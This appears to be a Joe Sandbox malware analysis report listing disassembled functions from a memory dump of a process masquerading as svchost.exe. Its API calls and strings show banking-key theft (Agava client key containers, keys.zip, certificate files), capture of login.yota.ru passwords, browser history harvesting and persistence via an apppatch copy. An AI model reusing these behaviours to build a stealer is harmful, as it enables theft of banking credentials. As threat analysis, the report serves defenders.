\*.bk, xrefs: 02C8E600
path.txt, xrefs: 02C8E478
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02C8E65B
82c319a5, xrefs: 02C8E3F3, 02C8E3FE, 02C8E4E1, 02C8E4EC
keys\, xrefs: 02C8E559
P0#v, xrefs: 02C8E67A

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorLast$Path$CreateFileHeap$AdminDirectoryFolderMakeSystemUser$AttributesBackslashHandleMutexProcess$CloseDeleteFreeInformationOperationReleaseSleepValidatememset
String ID: 82c319a5$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$P0#v$\*.bk$keys\$path.txt
API String ID: 959110331-2774194608
Opcode ID: 1da50f901f1b2a8d493264affff5fc432652e40cbd1404d00f32b51ac39a5e99
Instruction ID: 6466789fbf7a30f9a499f4654a09d8404d133709c81ab2713913d2c9a38732de
Opcode Fuzzy Hash: 1da50f901f1b2a8d493264affff5fc432652e40cbd1404d00f32b51ac39a5e99
Instruction Fuzzy Hash: A2911870E4468A9FE7129FB4982D7AB7BE8EF89309F148695F845D7301EB30CA05C790

Function 02C77110 Relevance: 63.2, APIs: 32, Strings: 4, Instructions: 182memorysleepsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 02C76CD0: IsUserAnAdmin.SHELL32 ref: 02C76CDA
Part of subcall function 02C76CD0: memset.MSVCRT ref: 02C76D11
Part of subcall function 02C76CD0: memset.MSVCRT ref: 02C76D29
Part of subcall function 02C76CD0: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,?,?,7622F380), ref: 02C76D4B
Part of subcall function 02C76CD0: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,?,00000104,?,?,?,?,7622F380), ref: 02C76D71
Part of subcall function 02C76CD0: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,7622F380), ref: 02C76DFD
Part of subcall function 02C76CD0: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,7622F380), ref: 02C76E04

OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02C77155
Sleep.KERNEL32(00000064), ref: 02C77162
OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02C77174
ReleaseMutex.KERNEL32(00000000), ref: 02C7717D
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C77195
CloseHandle.KERNEL32(00000000), ref: 02C771A7
GetProcessHeap.KERNEL32(00000000,00000000,7D2DE4BBa,7d2de43aa), ref: 02C771B2
HeapValidate.KERNEL32(00000000), ref: 02C771B5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C771C2
HeapFree.KERNEL32(00000000), ref: 02C771C5
GetProcessHeap.KERNEL32(00000000,00000000,7D2DE4BBa,7d2de43aa), ref: 02C771D2
HeapValidate.KERNEL32(00000000), ref: 02C771D5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C771E2
HeapFree.KERNEL32(00000000), ref: 02C771E5
SetCaretBlinkTime.USER32(000000FF), ref: 02C771F7
Sleep.KERNEL32(000001F4), ref: 02C77225
StrToIntA.SHLWAPI(00000000,7D2DE4BBa,7d2de43aa), ref: 02C77255
GetProcessHeap.KERNEL32(00000000,00000000,7D2DE4BBa,7d2de43aa), ref: 02C77265
HeapValidate.KERNEL32(00000000), ref: 02C77268
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C77275
HeapFree.KERNEL32(00000000), ref: 02C77278
GetProcessHeap.KERNEL32(00000000,00000000,7D2DE4BBa,7d2de43aa), ref: 02C77285
HeapValidate.KERNEL32(00000000), ref: 02C77288
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C77295
HeapFree.KERNEL32(00000000), ref: 02C77298
Sleep.KERNEL32(00001388,7D2DE4BBa,7d2de43aa), ref: 02C772A3
closesocket.WS2_32(?), ref: 02C772D5
HeapFree.KERNEL32(00000000,00000000,?), ref: 02C772F5
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C7730D
ReleaseMutex.KERNEL32(00000000), ref: 02C7731F
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C77342
CloseHandle.KERNEL32(00000000), ref: 02C7735C

Strings

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}, xrefs: 02C7714A, 02C77168
7D2DE4BBa, xrefs: 02C7712A, 02C7723E
P0#v, xrefs: 02C7717D, 02C7731F
7d2de43aa, xrefs: 02C77120, 02C77234

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$HandleMutexValidate$OpenSleep$CloseInformationReleasememset$AdminAllocBlinkCaretQueryTimeUserValueclosesocket
String ID: 7D2DE4BBa$7d2de43aa$Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}$P0#v
API String ID: 2871222221-1211495773
Opcode ID: 3548ed7930c8310a1a6d6fdce46fdacbe7c0baa39350409f53353e310799427f
Instruction ID: 355d3170b7eb5f5d60cfc9c333afc7f07641622d6f6c910446bbb4ad717ae0df
Opcode Fuzzy Hash: 3548ed7930c8310a1a6d6fdce46fdacbe7c0baa39350409f53353e310799427f
Instruction Fuzzy Hash: CC51E331E84798ABE722AB709C0CF2BBB6CAF84B55F044B54F919C7181DB74D9148BA1

Function 02C8B260 Relevance: 58.0, APIs: 25, Strings: 8, Instructions: 268fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C8B27F
PathAddBackslashA.SHLWAPI(82C3184B), ref: 02C8B2B7
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B2F7
GetLastError.KERNEL32 ref: 02C8B301
IsUserAnAdmin.SHELL32 ref: 02C8B309
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B31A
SetLastError.KERNEL32(00000000), ref: 02C8B321
StrStrIA.SHLWAPI(?,crypto), ref: 02C8B333
StrStrIA.SHLWAPI(?,self.cer), ref: 02C8B346
StrStrIA.SHLWAPI(?,self.pub), ref: 02C8B357
SetFileAttributesA.KERNEL32(?,00000000), ref: 02C8B3A2
DeleteFileA.KERNEL32(?), ref: 02C8B3AF

Strings

crypto, xrefs: 02C8B32D
self.cer, xrefs: 02C8B33B
keys.zip, xrefs: 02C8B45B
self.pub, xrefs: 02C8B34F
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}, xrefs: 02C8B4C4
path.txt, xrefs: 02C8B37F
82C3184B, xrefs: 02C8B2B2, 02C8B2BD, 02C8B412, 02C8B41D
P0#v, xrefs: 02C8B4E5

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorFileLastPath$AdminAttributesBackslashCreateDeleteDirectoryFolderMakeSystemUsermemset
String ID: 82C3184B$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$P0#v$crypto$keys.zip$path.txt$self.cer$self.pub
API String ID: 3980609930-401678537
Opcode ID: 8d69909094daf1b09538030effbc9798d8e4e2f7ea46bc0f6493ce76d0cedd48
Instruction ID: 5ad5ee6bccef20e133d7fc16b21af62fb9397bf821c6795b30a19155e8360a8c
Opcode Fuzzy Hash: 8d69909094daf1b09538030effbc9798d8e4e2f7ea46bc0f6493ce76d0cedd48
Instruction Fuzzy Hash: 98912631D402999FDB16AB749C59BEA7BE8AFC570CF04C698E94AD7240DB70DE04CB90

Function 02C92AE0 Relevance: 56.2, APIs: 24, Strings: 8, Instructions: 193stringsynchronizationsleepCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 02C92B23
strstr.MSVCRT ref: 02C92B36
strstr.MSVCRT ref: 02C92B49
PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92B77
PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92BAD
CreateDirectoryA.KERNEL32(?,00000000,02CCAFC0), ref: 02C92BC2
GetLastError.KERNEL32 ref: 02C92BCC
IsUserAnAdmin.SHELL32 ref: 02C92BD4
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92BE5
SetLastError.KERNEL32(00000000), ref: 02C92BEC
SetCurrentDirectoryA.KERNEL32(?), ref: 02C92BF9
strstr.MSVCRT ref: 02C92C2C
PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92C57
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C92C91
GetLastError.KERNEL32 ref: 02C92C9B
IsUserAnAdmin.SHELL32 ref: 02C92CA3
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92CB4
SetLastError.KERNEL32(00000000), ref: 02C92CBB
SetCurrentDirectoryA.KERNEL32(?), ref: 02C92CC8
CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214},02C8753A,02C8753B), ref: 02C92CFE
Sleep.KERNEL32(000003E8), ref: 02C92D0F
ReleaseMutex.KERNEL32(00000000), ref: 02C92D16
GetHandleInformation.KERNEL32(00000000,02C8753A), ref: 02C92D28
CloseHandle.KERNEL32(00000000), ref: 02C92D39

Strings

IDToken2=, xrefs: 02C92B43
YotaConfirmForm%5Bpassword%5D, xrefs: 02C92C26
login.yota.ru, xrefs: 02C92B1D
pass.txt, xrefs: 02C92C12
pass2.txt, xrefs: 02C92CE1
P0#v, xrefs: 02C92D16
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}, xrefs: 02C92CEB
IDToken1=, xrefs: 02C92B30

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Path$DirectoryErrorLaststrstr$BackslashCreate$AdminCurrentFolderHandleMakeMutexSystemUser$CloseInformationReleaseSleep
String ID: IDToken1=$IDToken2=$Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}$P0#v$YotaConfirmForm%5Bpassword%5D$login.yota.ru$pass.txt$pass2.txt
API String ID: 1263884631-1922424858
Opcode ID: 08561d88b8cbc3e258832f2eacacf9f89692b588722b0ab1872e5e37efeff1f5
Instruction ID: 93fde4a2732c95acd5d75c4d9674dba764e2e6ed506e508d1241570a2ef67f6d
Opcode Fuzzy Hash: 08561d88b8cbc3e258832f2eacacf9f89692b588722b0ab1872e5e37efeff1f5
Instruction Fuzzy Hash: D651E031A406596BEF229B349C1CBAA3B9CAF85349F144A94ECC6D7140DF71C648CBA2

Function 02C753E0 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 271memoryfileCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(?,76232F00,00000000,76230F00), ref: 02C75405
SetFileAttributesA.KERNEL32(?,00000000), ref: 02C7543F
DeleteFileA.KERNEL32(?), ref: 02C7544C
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C7546B
SHGetFolderPathA.SHELL32(00000000,00000022,00000000,00000000,?), ref: 02C7548C
GetProcessHeap.KERNEL32(00000000,00000000,02C82665,00000001), ref: 02C7550B
HeapValidate.KERNEL32(00000000), ref: 02C7550E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7551B
HeapFree.KERNEL32(00000000), ref: 02C7551E
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C75533

Strings

\Opera\Opera\global_history.dat, xrefs: 02C755FA
http, xrefs: 02C75580
\Opera\Opera\typed_history.xml, xrefs: 02C75555
\History.IE5\index.dat, xrefs: 02C754AE
http, xrefs: 02C75620
links.log, xrefs: 02C7541A
http, xrefs: 02C754E0

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FilePath$FolderProcess$AttributesBackslashCreateDeleteFreeValidate
String ID: \History.IE5\index.dat$\Opera\Opera\global_history.dat$\Opera\Opera\typed_history.xml$http$http$http$links.log
API String ID: 772302041-762728116
Opcode ID: a3472fe0c7af3a7a90eb6693d0528da1f65fd5715031649f65d91ef3466f12b1
Instruction ID: 22586ef335f1538914494fa27962e674e6c067f21e5578ca48d3104f23decb94
Opcode Fuzzy Hash: a3472fe0c7af3a7a90eb6693d0528da1f65fd5715031649f65d91ef3466f12b1
Instruction Fuzzy Hash: 1B913B70E40359ABDB22CF60DC84FEABBB9EF44744F844584E945AB180DB70AB45CB90

Function 004017F0 Relevance: 52.7, APIs: 29, Strings: 1, Instructions: 234memoryprocessCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040181B
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,75C25430,00000000,?), ref: 00401833
GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040185D
HeapAlloc.KERNEL32(00000000), ref: 00401860
memset.MSVCRT ref: 00401873
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401898
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004018AC
GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004018CA
HeapAlloc.KERNEL32(00000000), ref: 004018CD
memset.MSVCRT ref: 004018DD
MultiByteToWideChar.KERNEL32(00000000,00000000,00401E65,000000FF,00000000,00000000), ref: 004018FF
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401913
GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401933
HeapAlloc.KERNEL32(00000000), ref: 0040193A
memset.MSVCRT ref: 0040194A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401967
CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040199B
GetProcessHeap.KERNEL32(00000000,?), ref: 004019AD
HeapValidate.KERNEL32(00000000), ref: 004019B6
GetProcessHeap.KERNEL32(00000000,?), ref: 004019C2
HeapFree.KERNEL32(00000000), ref: 004019C5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019D2
HeapValidate.KERNEL32(00000000), ref: 004019D5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019DE
HeapFree.KERNEL32(00000000), ref: 004019E1
GetProcessHeap.KERNEL32(00000000,00401E65), ref: 004019F1
HeapValidate.KERNEL32(00000000), ref: 004019F4
GetProcessHeap.KERNEL32(00000000,00401E65), ref: 00401A01
HeapFree.KERNEL32(00000000), ref: 00401A04

Strings

D, xrefs: 00401994

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
String ID: D
API String ID: 3422789474-2746444292
Opcode ID: 305985fe563536e86098805144d0a2e1e56e9e587e80ceb7f6eacc4e8f8e770f
Instruction ID: 7aa473d0462345c53030a0d843d553fe9ec79da9d6527bb3e9654a4a16b7ec1b
Opcode Fuzzy Hash: 305985fe563536e86098805144d0a2e1e56e9e587e80ceb7f6eacc4e8f8e770f
Instruction Fuzzy Hash: 4A6195B1A01215BBDB209FA58C45FAF7B6CEF84751F15422AFE14B72D0CA749D00CAA8

Function 02C79B50 Relevance: 51.0, APIs: 26, Strings: 3, Instructions: 275COMMON

Download Yara Rule

Strings

taskmgr, xrefs: 02C79D28
open, xrefs: 02C79D2D
P0#v, xrefs: 02C79D3F, 02C79D7E

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: P0#v$open$taskmgr
API String ID: 0-2917657181
Opcode ID: 51c55ab250984b1378fc020d1e451df96e5a679c7bc0090d7aa38ddf5273bc60
Instruction ID: c90015fce84a43227881360fce1100c2b29f9ed26db122529d9413665eac2634
Opcode Fuzzy Hash: 51c55ab250984b1378fc020d1e451df96e5a679c7bc0090d7aa38ddf5273bc60
Instruction Fuzzy Hash: 6B91C431A80284EBD712DF69ED49FABBB7CEBC5711F104B95F90597281C730A961CBA0

Function 02C91BA0 Relevance: 51.0, APIs: 17, Strings: 12, Instructions: 273stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02C93170: memset.MSVCRT ref: 02C93194
Part of subcall function 02C93170: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C9319F

OpenProcess.KERNEL32(00000410,00000000,00000000,Agava_Client.exe), ref: 02C91BC6
GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02C91BE5
GetHandleInformation.KERNEL32(00000000,?), ref: 02C91BF7
CloseHandle.KERNEL32(00000000), ref: 02C91C08
GetPrivateProfileStringA.KERNEL32(Containers,UseToken,00000000,?,00000104,?), ref: 02C91C50
strstr.MSVCRT ref: 02C91C64
GetPrivateProfileStringA.KERNEL32(Containers,KeysDiskPath,00000000,?,00000104,?), ref: 02C91CA4
strstr.MSVCRT ref: 02C91CB2
strstr.MSVCRT ref: 02C91CC7
SetCurrentDirectoryA.KERNEL32(?), ref: 02C91D64
PathAddBackslashA.SHLWAPI(82c31d1a), ref: 02C91D9D

Strings

Containers, xrefs: 02C91C4B, 02C91C9F
keys.zip, xrefs: 02C91DE8
82c31d1a, xrefs: 02C91D98, 02C91D9F, 02C91E32, 02C91E39
Agava_Client.ini, xrefs: 02C91CC1
keys_path.txt, xrefs: 02C91E78
Agava_Client.exe, xrefs: 02C91BAC
UseToken, xrefs: 02C91C46
KeysDiskPath, xrefs: 02C91C9A
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}, xrefs: 02C91EDE
P0#v, xrefs: 02C91EFF
.ini, xrefs: 02C91C32
Agava_keys, xrefs: 02C91D38

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: strstr$HandlePrivateProfileString$BackslashCloseCreateCurrentDirectoryFileInformationModuleNameOpenPathProcessSnapshotToolhelp32memset
String ID: .ini$82c31d1a$Agava_Client.exe$Agava_Client.ini$Agava_keys$Containers$KeysDiskPath$Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$P0#v$UseToken$keys.zip$keys_path.txt
API String ID: 2651364649-505903401
Opcode ID: f157bce3519caa51ccfa1cf44a88d0117712d04f1532c881308efa320934b9bd
Instruction ID: 8530997ed578a2fdf82a443dd6cfe597021f2c815232704f86ca57ebae2b196d
Opcode Fuzzy Hash: f157bce3519caa51ccfa1cf44a88d0117712d04f1532c881308efa320934b9bd
Instruction Fuzzy Hash: 15A1193194429E8FDF17CB249C5DBEA7BE9EF45300F1846E4E949D7240EBB19A48CB90

Function 00402950 Relevance: 51.0, APIs: 22, Strings: 7, Instructions: 223memorylibraryloaderCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(00401C30,?,0000001C,00000000,00000000,76D6DB30), ref: 0040298B
GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004029A3
PathFileExistsA.SHLWAPI(?), ref: 004029C4
GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 004029DC
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402A1D
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402A2D
GetCurrentProcess.KERNEL32(?), ref: 00402A3E
GetTickCount.KERNEL32 ref: 00402A76

Part of subcall function 004012A0: GetTickCount.KERNEL32 ref: 004012AB
Part of subcall function 004012A0: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A82,00000000), ref: 004012BC
Part of subcall function 004012A0: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004012CC

Part of subcall function 00401330: GetTickCount.KERNEL32 ref: 0040135A
Part of subcall function 00401330: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A8E,-00000006,00000000), ref: 00401367
Part of subcall function 00401330: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401373

_snprintf.MSVCRT ref: 00402AF0
CopyFileA.KERNEL32(?,?,00000001), ref: 00402B08
RtlImageNtHeader.NTDLL(00000000), ref: 00402B3A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402B65
HeapValidate.KERNEL32(00000000), ref: 00402B68
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402B74
HeapFree.KERNEL32(00000000), ref: 00402B77
MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402B96
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402BA5
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402BB5
GetCurrentProcess.KERNEL32(?), ref: 00402BC6
GlobalFindAtomA.KERNEL32(Fri Jun 17 05:52:09 20111), ref: 00402BE4
ExitProcess.KERNEL32 ref: 00402BF5
GlobalAddAtomA.KERNEL32(Fri Jun 17 05:52:09 20111), ref: 00402C00

Strings

svchost.exe, xrefs: 00402A5A
Fri Jun 17 05:52:09 20111, xrefs: 00402BDF, 00402BFB
IsWow64Process, xrefs: 00402A27, 00402BAF
.dat, xrefs: 00402AC8
\apppatch\, xrefs: 004029EF
%s_, xrefs: 00402ADE
kernel32.dll, xrefs: 00402A11, 00402B9C

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
String ID: %s_$.dat$Fri Jun 17 05:52:09 20111$IsWow64Process$\apppatch\$kernel32.dll$svchost.exe
API String ID: 4049655197-4201755136
Opcode ID: bb8a968c219bfac3fd61da6bd44f777cdfedeba1d50c59b884a37fb13913d547
Instruction ID: 2b42465635bf5f89377a844675b664ed4d82d183fb77d3ed61f84ac94699b08c
Opcode Fuzzy Hash: bb8a968c219bfac3fd61da6bd44f777cdfedeba1d50c59b884a37fb13913d547
Instruction Fuzzy Hash: A5718FB15143419BC310EF70DE8896B7BE9BBC8300B54493EF686B72A1D778D944CB99

Function 02C89ED0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 214fileCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(82c3181f), ref: 02C89F18
CreateDirectoryA.KERNEL32(02CCB9D8,00000000), ref: 02C89F58
GetLastError.KERNEL32 ref: 02C89F5E
IsUserAnAdmin.SHELL32 ref: 02C89F66
PathMakeSystemFolderA.SHLWAPI(02CCB9D8), ref: 02C89F75
SetLastError.KERNEL32(00000000), ref: 02C89F7C
SetFileAttributesA.KERNEL32(02CCB9D8,00000000), ref: 02C89FB1
DeleteFileA.KERNEL32(02CCB9D8), ref: 02C89FBC
PathAddBackslashA.SHLWAPI(82c3181f,00000000,00000001), ref: 02C8A006

Strings

path.txt, xrefs: 02C89F90
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}, xrefs: 02C8A0DD
82c3181f, xrefs: 02C89F13, 02C89F1E, 02C8A001, 02C8A00C
P0#v, xrefs: 02C8A0FA

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUser
String ID: 82c3181f$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0#v$path.txt
API String ID: 2920098687-3480082132
Opcode ID: d62764c66fd3447da8bde9fdfd18aef49824ac741345b335b420c89d97344146
Instruction ID: e060a6dc4a62d9af18e8e24f33a177b5cb2f0831524c4b233497ef898910154f
Opcode Fuzzy Hash: d62764c66fd3447da8bde9fdfd18aef49824ac741345b335b420c89d97344146
Instruction Fuzzy Hash: 74614431A406819FE7165B749C59B7B3BE8AF8974AF188699FC87CB341CB71CA04C790

Function 00403579 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 292memoryfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035AB
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035F7
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035FE
memset.MSVCRT ref: 00403616
_snwprintf.MSVCRT ref: 00403630
CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403653
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040366A
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040367E
ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004036D3
wcsstr.MSVCRT ref: 004036F2
wcsstr.MSVCRT ref: 00403725
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004037BB
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004037EC
SetEndOfFile.KERNEL32(00000000), ref: 004037F3
CloseHandle.KERNEL32(00000000), ref: 004037FA
VariantInit.OLEAUT32(00000000), ref: 0040382B
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403887
HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040388A
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403897
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040389A
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038AD
HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038B0
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038BD
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038C0

Strings

p=Dv, xrefs: 0040382B
<Actions , xrefs: 004036EA
00-->, xrefs: 0040371F

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

